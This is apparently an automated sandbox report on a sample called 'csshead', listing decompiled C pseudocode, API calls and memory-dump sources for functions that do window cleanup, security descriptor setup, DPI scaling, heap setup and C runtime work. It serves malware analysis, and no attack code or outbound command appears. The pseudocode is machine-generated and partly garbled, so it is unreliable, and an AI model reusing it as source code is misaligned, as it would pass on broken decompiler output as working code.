Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00412380, Relevance: 9.1, APIs: 6, Instructions: 107window

APIs

GetMessagePos.USER32 ref: 00412389
WindowFromPoint.USER32(?,00000000), ref: 004123BB
ScreenToClient.USER32(?,?), ref: 004123CF
SendMessageA.USER32(?,00000445,00000000,?), ref: 004123E5
GetMenuItemCount.USER32(?), ref: 00412415

Part of subcall function 00410FD0: SendMessageA.USER32(?,00000417,?,?), ref: 00410FE2

ScreenToClient.USER32(?,?), ref: 004124BF

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0040F870, Relevance: 9.1, APIs: 6, Instructions: 98
window

C-Code - Quality: 89%

			E0040F870(void* __ebx, void* __ecx) {
				struct HMENU__* _t35;
				intOrPtr _t36;
				void* _t38;
				intOrPtr _t43;
				void* _t63;
				void* _t64;

				_t63 = __ecx;
				if(IsWindow( *(__ecx + 0x5c)) != 0) {
					if( *((intOrPtr*)(_t63 + 0x6c)) == GetWindowLongA( *(_t63 + 0x5c), 0xfffffffc) && SetWindowLongA( *(_t63 + 0x5c), 0xfffffffc,  *(_t63 + 0x74)) != 0) {
						 *(_t63 + 0x74) =  *0x4334dc;
						 *(_t63 + 0x5c) = 0;
					}
				}
				_t35 =  *(_t63 + 0x44);
				if(_t35 != 0 && ( *(_t63 + 0x58) & 0x00000002) == 0) {
					DestroyMenu(_t35);
				}
				_t36 =  *((intOrPtr*)(_t63 + 0x48));
				if(_t36 != 0) {
					 *0x433030(_t36);
				}
				_t37 =  *((intOrPtr*)(_t63 + 0xb4));
				if( *((intOrPtr*)(_t63 + 0xb4)) != 0) {
					E00422804(_t37);
					_t64 = _t64 + 4;
					 *((intOrPtr*)(_t63 + 0xb4)) = 0;
				}
				 *((intOrPtr*)(_t63 + 0xb8)) = 0;
				 *((intOrPtr*)(_t63 + 0xbc)) = 0;
				_t38 =  *(_t63 + 0xa4);
				if(_t38 != 0 && DeleteObject(_t38) != 0) {
					 *(_t63 + 0xa4) = 0;
				}
				_t39 =  *((intOrPtr*)(_t63 + 0x6c));
				if( *((intOrPtr*)(_t63 + 0x6c)) != 0) {
					L00421E7E(_t39);
				}
				_t40 =  *((intOrPtr*)(_t63 + 0x4c));
				if( *((intOrPtr*)(_t63 + 0x4c)) != 0) {
					E00422804(_t40);
					_t64 = _t64 + 4;
					 *((intOrPtr*)(_t63 + 0x4c)) = 0;
				}
				 *((intOrPtr*)(_t63 + 0x50)) = 0;
				 *((intOrPtr*)(_t63 + 0x54)) = 0;
				_t41 =  *((intOrPtr*)(_t63 + 0x34));
				if( *((intOrPtr*)(_t63 + 0x34)) != 0) {
					L00421E7E(_t41);
				}
				_t42 =  *((intOrPtr*)(_t63 + 0x14));
				if( *((intOrPtr*)(_t63 + 0x14)) != 0) {
					E00422804(_t42);
					_t64 = _t64 + 4;
					 *((intOrPtr*)(_t63 + 0x14)) = 0;
				}
				 *((intOrPtr*)(_t63 + 0x18)) = 0;
				 *((intOrPtr*)(_t63 + 0x1c)) = 0;
				_t43 =  *((intOrPtr*)(_t63 + 8));
				if(_t43 != 0) {
					_t43 = E00422804(_t43);
					 *((intOrPtr*)(_t63 + 8)) = 0;
				}
				 *((intOrPtr*)(_t63 + 0x10)) = 0;
				 *((intOrPtr*)(_t63 + 0xc)) = 0;
				return _t43;
			}

0x0040f871
0x0040f882
0x0040f897
0x0040f8b3
0x0040f8b6
0x0040f8b6
0x0040f897
0x0040f8b9
0x0040f8be
0x0040f8c7
0x0040f8c7
0x0040f8cd
0x0040f8d2
0x0040f8d5
0x0040f8d5
0x0040f8db
0x0040f8e3
0x0040f8e6
0x0040f8eb
0x0040f8ee
0x0040f8ee
0x0040f8f4
0x0040f8fa
0x0040f900
0x0040f908
0x0040f915
0x0040f915
0x0040f91b
0x0040f920
0x0040f923
0x0040f923
0x0040f928
0x0040f92d
0x0040f930
0x0040f935
0x0040f938
0x0040f938
0x0040f93b
0x0040f93e
0x0040f941
0x0040f946
0x0040f949
0x0040f949
0x0040f94e
0x0040f953
0x0040f956
0x0040f95b
0x0040f95e
0x0040f95e
0x0040f961
0x0040f964
0x0040f967
0x0040f96c
0x0040f96f
0x0040f977
0x0040f977
0x0040f97a
0x0040f97d
0x0040f982

APIs

IsWindow.USER32(?), ref: 0040F878
GetWindowLongA.USER32(?,000000FC), ref: 0040F88E
SetWindowLongA.USER32(?,000000FC,?), ref: 0040F8A3
DestroyMenu.USER32(?), ref: 0040F8C7
ImageList_Destroy.COMCTL32(?), ref: 0040F8D5
DeleteObject.GDI32(?), ref: 0040F90B

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC), ref: 0042282C

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00415510, Relevance: 9.1, APIs: 6, Instructions: 86

APIs

GetSysColorBrush.USER32(0000001D), ref: 0041557A
FillRect.USER32(?,?,00000000), ref: 00415586
GetSysColorBrush.USER32(0000000D), ref: 0041558E
FrameRect.USER32(?,?,00000000), ref: 0041559A
GetSysColor.USER32(00000011), ref: 004155C4

Part of subcall function 00413E50: SetTextColor.GDI32(?,?), ref: 00413E6B
Part of subcall function 00413E50: SetBkMode.GDI32(?,?), ref: 00413E76
Part of subcall function 00413E50: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00413E86
Part of subcall function 00413E50: SelectObject.GDI32(?,00000000), ref: 00413E9C
Part of subcall function 00413E50: SendMessageA.USER32 ref: 00413F0F
Part of subcall function 00413E50: DrawTextA.USER32(?,000000C8,000000FF,?,?), ref: 00413F37
Part of subcall function 00413E50: SelectObject.GDI32(?,?), ref: 00413F47

GetSysColor.USER32(00000011), ref: 004155F3

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00404408, Relevance: 9.1, APIs: 6, Instructions: 85

C-Code - Quality: 64%

			E00404408(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
				intOrPtr* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				struct _ACL* _v16;
				void* _v20;
				int _v24;
				int _v28;
				struct _ACL* _v32;
				intOrPtr _t37;
				signed int _t38;
				signed int _t50;
				signed int _t59;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
					_t37 =  *0x40a0d4; // 0x401cb4
					_t38 =  *0x40b32c(_t37, 1,  &_v20, 0);
					asm("sbb eax, eax");
					if( ~( ~_t38) == 0) {
						_v20 = 0xffffffff;
					} else {
						_v32 = 0;
						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
						asm("sbb eax, eax");
						if( ~( ~_t50) == 0) {
							L5:
							LocalFree(_v20);
							_v20 = 0xffffffff;
						} else {
							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
							asm("sbb eax, eax");
							if( ~( ~_t59) == 0) {
								goto L5;
							}
						}
					}
					if(_v8 != 0) {
						 *_v8 = 0xc;
						 *(_v8 + 4) = _v12;
						 *((intOrPtr*)(_v8 + 8)) = 0;
					}
					_v16 = _v20;
				}
				return _v16;
			}

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040441F
SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00404437
ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401CB4,00000001,?,00000000), ref: 00404453
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404478
SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404498
LocalFree.KERNEL32(?), ref: 004044AC

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 0042B900, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 322

APIs

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

__isleadbyte_l.LIBCMT ref: 0042B7B9
_strlen.LIBCMT ref: 0042B8D3
__aulldvrm.INT64 ref: 0042BC12
_write_string.LIBCMT ref: 0042BD55
_write_string.LIBCMT ref: 0042BE26

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045

Strings

g, xrefs: 0042BA8F
@, xrefs: 0042B6E8

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0040A4A0, Relevance: 9.0, APIs: 6, Instructions: 48

C-Code - Quality: 100%

			E0040A4A0(int* _a4, intOrPtr* _a8) {
				int _v4;
				int _v12;
				int _t9;
				int _t13;
				int* _t16;
				intOrPtr* _t20;
				struct HDC__* _t23;

				_t16 = _a4;
				if(_t16 == 0) {
					L00401230(0x80004003);
				}
				_t20 = _a8;
				if(_t20 == 0) {
					L00401230(0x80004003);
				}
				_t23 = GetDC(0);
				_v4 = GetDeviceCaps(_t23, 0x58);
				_t9 = GetDeviceCaps(_t23, 0x5a);
				ReleaseDC(0, _t23);
				 *_t20 = MulDiv(0x9ec,  *_t16, _v12);
				_t13 = MulDiv(0x9ec, _t16[1], _t9);
				 *(_t20 + 4) = _t13;
				return _t13;
			}

0x0040a4a1
0x0040a4a7
0x0040a4ae
0x0040a4ae
0x0040a4b4
0x0040a4ba
0x0040a4c1
0x0040a4c1
0x0040a4d6
0x0040a4e0
0x0040a4e4
0x0040a4eb
0x0040a506
0x0040a512
0x0040a516
0x0040a51b

APIs

MulDiv.KERNEL32(000009EC,?,00000000), ref: 0040A512

Part of subcall function 00401230: RaiseException.KERNEL32(-C006C020,00000001,00000000,00000000,0040807F,80004005), ref: 0040124C

GetDC.USER32(00000000), ref: 0040A4CA
GetDeviceCaps.GDI32(00000000,00000058), ref: 0040A4DB
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040A4E4
ReleaseDC.USER32(00000000,00000000), ref: 0040A4EB
MulDiv.KERNEL32(000009EC,?,?), ref: 0040A504

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00421E10, Relevance: 9.0, APIs: 6, Instructions: 47

C-Code - Quality: 100%

			E00421E10() {
				int _t3;
				long _t5;
				long _t7;
				long _t13;
				void* _t19;
				LONG* _t22;

				_t3 = IsProcessorFeaturePresent(0xc);
				if(_t3 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x34;
					_t5 =  *_t22;
					if(_t5 != 0) {
						L7:
						 *0x442b5c = _t5;
						_t7 = 1;
					} else {
						_t19 = HeapAlloc(GetProcessHeap(), _t5, 8);
						_t7 = 0;
						if(_t19 != 0) {
							 *_t19 = 0;
							 *((intOrPtr*)(_t19 + 4)) = 0;
							if(InterlockedCompareExchange(_t22, _t19, 0) != 0) {
								HeapFree(GetProcessHeap(), 0, _t19);
							}
							_t5 =  *_t22;
							goto L7;
						}
					}
					return _t7;
				} else {
					_t13 = _t3 + 1;
					 *0x442b5c = _t13;
					return _t13;
				}
			}

0x00421e12
0x00421e1a
0x00421e2e
0x00421e31
0x00421e36
0x00421e72
0x00421e72
0x00421e79
0x00421e38
0x00421e4a
0x00421e4c
0x00421e50
0x00421e55
0x00421e57
0x00421e62
0x00421e6a
0x00421e6a
0x00421e70
0x00000000
0x00421e70
0x00421e50
0x00421e7d
0x00421e1c
0x00421e1c
0x00421e1d
0x00421e22
0x00421e22

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,00421EA0,?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40,000000FF), ref: 00421E12
GetProcessHeap.KERNEL32(00000018,00000008,?,?,?,?,?,0040892B,00000000,(XC,0043C9F8), ref: 00421E41
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040892B,00000000,(XC,0043C9F8), ref: 00421E44
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00421E5A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,0040892B,00000000,(XC,0043C9F8), ref: 00421E67
HeapFree.KERNEL32(00000000,?,?,?,?,?,0040892B,00000000,(XC,0043C9F8), ref: 00421E6A

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0042B949, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 265

APIs

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

__isleadbyte_l.LIBCMT ref: 0042B7B9
_strlen.LIBCMT ref: 0042B8D3
__aulldvrm.INT64 ref: 0042BC12
_write_string.LIBCMT ref: 0042BD55
_write_string.LIBCMT ref: 0042BE26

Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

Strings

g, xrefs: 0042BA8F
, xrefs: 0042B949
@, xrefs: 0042B6E8

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042B9A7, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 260

APIs

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

__isleadbyte_l.LIBCMT ref: 0042B7B9
_strlen.LIBCMT ref: 0042B8D3
__aulldvrm.INT64 ref: 0042BC12
_write_string.LIBCMT ref: 0042BD55
_write_string.LIBCMT ref: 0042BE26

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045

Strings

g, xrefs: 0042BA8F
@, xrefs: 0042B6E8
g, xrefs: 0042B9A7

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00418480, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109registry

APIs

RtlEnterCriticalSection.NTDLL(00442B64), ref: 0041848C
RegisterClassExA.USER32 ref: 00418531
RegisterClassExA.USER32 ref: 004185D5
RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00418604

Strings

tXC, xrefs: 004185C9

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00417E60, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86
comstring

C-Code - Quality: 49%

			E00417E60(void* __ecx, void* __edi, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v4;
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				char _v28;
				void* _v40;
				void* __esi;
				intOrPtr* _t67;
				signed int _t72;
				void* _t75;
				signed int _t76;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				void* _t84;
				void* _t85;
				signed int _t86;
				signed int _t88;
				signed int _t93;
				signed int _t102;
				signed int _t104;
				signed int _t107;
				signed int _t109;
				signed int _t113;
				void* _t117;
				signed int _t122;
				signed int _t123;
				signed int _t125;
				struct HWND__* _t129;
				signed int _t130;
				signed int _t139;
				signed int _t146;
				struct HWND__* _t178;
				signed int _t182;
				struct HWND__* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				signed int _t189;
				unsigned int _t190;
				intOrPtr* _t192;
				void* _t202;
				void* _t204;
				signed int _t205;
				void* _t208;
				void* _t213;

				_t185 = __ecx;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				_t67 = E00423911(_t165, __edi, __ecx, __eflags, 0x14, _t184);
				_t204 = _t202 - 0x10 + 4;
				if(_t67 == 0) {
					_v8 = 0;
					L00423189( &_v4,  &_v8);
					_v8 = 0x435828;
					L00423991( &_v8, 0x43c9f8);
					asm("int3");
					asm("int3");
					_t205 = _t204 - 0x18;
					_t72 = _v4 - 1;
					__eflags = _t72;
					_push(_t185);
					_push(__edi);
					if(_t72 == 0) {
						 *0x4335d0(0);
						_t178 = _a4;
						_t186 =  *0x433388(_t178);
						_t75 = _t186 + 9;
						__eflags = _t75 - 0x400;
						if(_t75 > 0x400) {
							_t76 = E00422A18(_t165, _t178, _t186, _t75);
							_t205 = _t205 + 4;
							__eflags = _t76;
							if(_t76 != 0) {
								 *_t76 = 0xdddd;
								_t76 = _t76 + 8;
								__eflags = _t76;
							}
							_t139 = _t76;
						} else {
							_t76 = L00422450(_t75);
							_t139 = _t205;
							__eflags = _t139;
							if(_t139 != 0) {
								 *_t139 = 0xcccc;
								_t139 = _t139 + 8;
							}
						}
						_v20 = _t139;
						__eflags = _t139;
						if(_t139 == 0) {
							L40:
							_t77 = _t76 | 0xffffffff;
							__eflags = _t77;
							return _t77;
						} else {
							 *0x43338c(_t178, _t139, _t186 + 1);
							 *0x433398(_t178, 0x433c2a);
							_t80 = _a16;
							_t146 = 0;
							_t189 = 0;
							_v28 = 0;
							__eflags = _t80;
							if(_t80 != 0) {
								_t122 =  *_t80;
								__eflags = _t122;
								if(_t122 != 0) {
									_t189 =  *_t122 & 0x0000ffff;
								}
							}
							_v8 = _t146;
							__eflags = _t189 - _t146;
							if(_t189 != _t146) {
								_t182 =  *0x43321c(0x42, _t189);
								__eflags = _t182;
								if(_t182 != 0) {
									_t117 =  *0x433220(_t182);
									_t165 =  *_a16 + 2;
									__eflags =  *_a16 + 2;
									E00401850(_t117, _t189,  *_a16 + 2, _t189);
									_t205 = _t205 + 0x10;
									 *0x433224(_t182);
									 *0x4335e8(_t182, 1,  &_v8);
								}
								_t178 = _a4;
								_t146 = 0;
								__eflags = 0;
							}
							_v12 = _t146;
							_v16 = _t146;
							_v24 =  *0x4332a0(_t139) + 1;
							_t83 = E004036F0( &_v24,  *0x4332a0(_t139) + 1, 2);
							_t208 = _t205 + 0xc;
							__eflags = _t83;
							if(__eflags >= 0) {
								_t190 = _v24;
								__eflags = _t190 - 0x400;
								if(__eflags > 0) {
									L32:
									_t84 = L00405440( &_v12, _t178, _t190);
								} else {
									_t113 = L00404C30(_t165, __eflags, _t190);
									_t213 = _t208 + 4;
									__eflags = _t113;
									if(_t113 == 0) {
										goto L32;
									} else {
										L00422450(_t190);
										_t84 = _t213;
									}
								}
								__eflags = _t190 >> 1;
								_t85 = E00401810(_t84, _t139, _t190 >> 1, 3);
							} else {
								_t85 = 0;
							}
							_push(0);
							_push(0);
							_push(0x436a60);
							_t86 = L00410680(_v8, __eflags, _t85, _t178, _v8,  &_v16, 0);
							__eflags = _t86;
							if(_t86 >= 0) {
								_t192 = _v16;
								_t88 =  *((intOrPtr*)( *((intOrPtr*)( *_t192))))(_t192, 0x4361b4,  &_v28);
								__eflags = _t88;
								if(_t88 >= 0) {
									 *0x433408(_t178, 0xffffffeb, _v28);
									 *((intOrPtr*)( *((intOrPtr*)( *_t192 + 8))))(_t192);
									L00404940( &_v12);
									_t93 = _v8;
									__eflags = _t93;
									if(_t93 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 8))))(_t93);
									}
									E00405480( &_v20);
									goto L48;
								} else {
									 *((intOrPtr*)( *((intOrPtr*)( *_t192 + 8))))(_t192);
									L00404940( &_v12);
									_t102 = _v8;
									__eflags = _t102;
									if(_t102 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
									}
									_t104 = E00405480( &_v20) | 0xffffffff;
									__eflags = _t104;
									return _t104;
								}
							} else {
								_t107 = _v16;
								__eflags = _t107;
								if(_t107 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))(_t107);
								}
								L00404940( &_v12);
								_t109 = _v8;
								__eflags = _t109;
								if(_t109 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t109 + 8))))(_t109);
								}
								_t76 = E00405480( &_v20);
								goto L40;
							}
						}
					} else {
						_t123 = _t72 - 0x81;
						__eflags = _t123;
						if(_t123 == 0) {
							_t125 =  *0x433390(_a4, 0xffffffeb);
							__eflags = _t125;
							if(_t125 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t125 + 8))))(_t125);
							}
							 *0x4335cc();
						} else {
							__eflags = _t123 == 0x18e;
							if(_t123 == 0x18e) {
								__eflags = _a12 - 1;
								if(_a12 == 1) {
									_t129 = _a16;
									__eflags = _t129;
									if(_t129 != 0) {
										_t130 = GetWindowLongA(_t129, 0xffffffec);
										__eflags = _t130 & 0x00010000;
										if((_t130 & 0x00010000) != 0) {
											_t183 = _a4;
											SetWindowLongA(_t183, 0xffffffec, GetWindowLongA(_t183, 0xffffffec) | 0x00010000);
										}
									}
								}
							}
						}
						L48:
						return DefWindowProcA(_a4, _a8, _a12, _a16);
					}
				} else {
					 *((intOrPtr*)(_t185 + 4)) = _t67;
					 *_t67 = _t67;
					 *((intOrPtr*)( *((intOrPtr*)(_t185 + 4)) + 4)) =  *((intOrPtr*)(_t185 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t185 + 4)) + 8)) =  *((intOrPtr*)(_t185 + 4));
					 *((char*)( *((intOrPtr*)(_t185 + 4)) + 0x10)) = 1;
					 *((char*)( *((intOrPtr*)(_t185 + 4)) + 0x11)) = 1;
					return _t185;
				}
			}

0x00417e64
0x00417e68
0x00417e6f
0x00417e74
0x00417e79
0x00417eaa
0x00417eb2
0x00417ec1
0x00417ec9
0x00417ece
0x00417ecf
0x00417ed6
0x00417ed9
0x00417ed9
0x00417edb
0x00417edc
0x00417edd
0x00417f5e
0x00417f64
0x00417f6e
0x00417f70
0x00417f73
0x00417f78
0x00417f91
0x00417f96
0x00417f99
0x00417f9b
0x00417f9d
0x00417fa3
0x00417fa3
0x00417fa3
0x00417fa6
0x00417f7a
0x00417f7a
0x00417f7f
0x00417f81
0x00417f83
0x00417f85
0x00417f8b
0x00417f8b
0x00417f83
0x00417fa8
0x00417fab
0x00417fad
0x004180d6
0x004180d6
0x004180d6
0x004180e2
0x00417fb3
0x00417fb7
0x00417fc3
0x00417fc9
0x00417fcc
0x00417fce
0x00417fd0
0x00417fd3
0x00417fd5
0x00417fd7
0x00417fd9
0x00417fdb
0x00417fdd
0x00417fdd
0x00417fdb
0x00417fe0
0x00417fe3
0x00417fe5
0x00417ff0
0x00417ff2
0x00417ff4
0x00417ff7
0x00418003
0x00418003
0x00418009
0x0041800e
0x00418012
0x0041801f
0x0041801f
0x00418025
0x00418028
0x00418028
0x00418028
0x0041802b
0x0041802e
0x0041803f
0x00418042
0x00418047
0x0041804a
0x0041804c
0x00418052
0x00418055
0x0041805b
0x00418075
0x00418079
0x0041805d
0x0041805e
0x00418063
0x00418066
0x00418068
0x00000000
0x0041806a
0x0041806c
0x00418071
0x00418071
0x00418068
0x00418080
0x00418085
0x0041804e
0x0041804e
0x0041804e
0x0041808d
0x0041808f
0x00418091
0x0041809f
0x004180a4
0x004180a6
0x004180e5
0x004180f6
0x004180f8
0x004180fa
0x00418139
0x00418145
0x0041814a
0x0041814f
0x00418152
0x00418154
0x0041815c
0x0041815c
0x00418161
0x00000000
0x004180fc
0x00418102
0x00418107
0x0041810c
0x0041810f
0x00418111
0x00418119
0x00418119
0x00418123
0x00418123
0x0041812f
0x0041812f
0x004180a8
0x004180a8
0x004180ab
0x004180ad
0x004180b5
0x004180b5
0x004180ba
0x004180bf
0x004180c2
0x004180c4
0x004180cc
0x004180cc
0x004180d1
0x00000000
0x004180d1
0x004180a6
0x00417edf
0x00417edf
0x00417edf
0x00417ee4
0x00417f3f
0x00417f45
0x00417f47
0x00417f4f
0x00417f4f
0x00417f51
0x00417ee6
0x00417ee6
0x00417eeb
0x00417ef1
0x00417ef6
0x00417efc
0x00417eff
0x00417f01
0x00417f10
0x00417f12
0x00417f17
0x00417f1d
0x00417f2e
0x00417f2e
0x00417f17
0x00417f01
0x00417ef6
0x00417eeb
0x00418166
0x00418185
0x00418185
0x00417e7b
0x00417e7b
0x00417e7e
0x00417e83
0x00417e89
0x00417e91
0x00417e97
0x00417ea0
0x00417ea0

APIs

Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960

Part of subcall function 00423991: RaiseException.KERNEL32(?,?,?,?), ref: 004239D3

Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042A0F0,?,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6), ref: 00422A5D

